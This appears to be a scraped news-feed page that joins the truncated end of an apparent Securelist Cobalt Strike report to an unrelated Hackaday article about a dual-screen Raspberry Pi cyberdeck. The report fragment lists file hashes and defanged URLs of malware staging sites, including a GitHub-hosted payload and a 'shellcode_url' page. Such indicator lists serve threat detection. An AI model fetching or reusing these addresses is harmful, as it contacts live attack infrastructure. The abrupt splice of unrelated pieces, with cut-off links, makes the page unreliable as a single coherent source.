F9E20EB3113901D780D2A973FF539ACE
B2E24E061D0B5BE96BA76233938322E7
15E590E8E6E9E92A18462EF5DFB94298
66B6E4D3B6D1C30741F2167F908AB60D
ADD6B9A83453DB9E8D4E82F5EE46D16C
A02C80AD2BF4BFFBED9A77E9B02410FF
672222D636F5DC51F5D52A6BD800F660
2662D1AE8CF86B0D64E73280DF8C19B3
4948E80172A4245256F8627527D7FA96

URL
hxxps://techcommunity[.]microsoft[.]com/users/kyongread/2573674
hxxps://techcommunity[.]microsoft[.]com/users/mariefast14/2631452
hxxps://raw[.]githubusercontent[.]com/fox7711/repos/main/1202[.]dat
hxxps://my[.]mail[.]ru/mail/nadezhd_1/photo/123
hxxps://learn[.]microsoft[.]com/en-us/collections/ypkmtp5wxwojz2
hxxp://10[.]2[.]115[.]160/aa/shellcode_url[.]html
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2548260
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2631452
hxxps://github[.]com/Mashcheeva
hxxps://my[.]mail[.]ru/mail/veselina9/photo/mARRy
hxxps://github[.]com/Kimoeli
hxxps://www[.]quora[.]com/profile/Marieformach
hxxps://moeodincovo[.]com/divide/mail/SUVVJRQO8QRC


securelist.com/cobalt-strike-a…



A Dual-Screen Cyberdeck To Rule Them All


We like cyberdecks here at Hackaday, and in our time we’ve brought you some pretty amazing builds. But perhaps now we’ve seen the ultimate of the genre, a cyberdeck so perfect in its execution that this will be the machine of choice in the dystopian future, leaving all the others as mere contenders. It comes courtesy of [Sector 07], and it’s a machine to be proud of.

As with many cyberdecks, it uses the Raspberry Pi as its powerhouse. There are a couple of nice touchscreens and a decent keyboard, plus the usual ports and some nice programmable controls. These are none of them out of the ordinary for a cyberdeck, but what really shines with this one is the attention to detail in the mechanical design. Those touchscreens rotate on ball bearings, the hinges are just right, the connections to the Pi have quick release mechanisms, and custom PCBs and ribbon cables make distributing those GPIOs a snap.

On top of all that the aesthetics are on point; this is the machine you want to take into the abandoned mining base with you. Best of all it’s all available from the linked GitHub repository, and you can marvel as we did at the video below the break.

If you hunger for more cyberdecks, this one has some very stiff competition.

youtube.com/embed/cigAxzQGeLg?…

Thanks [Jeremy Geppert] for the tip.


hackaday.com/2025/07/30/a-dual…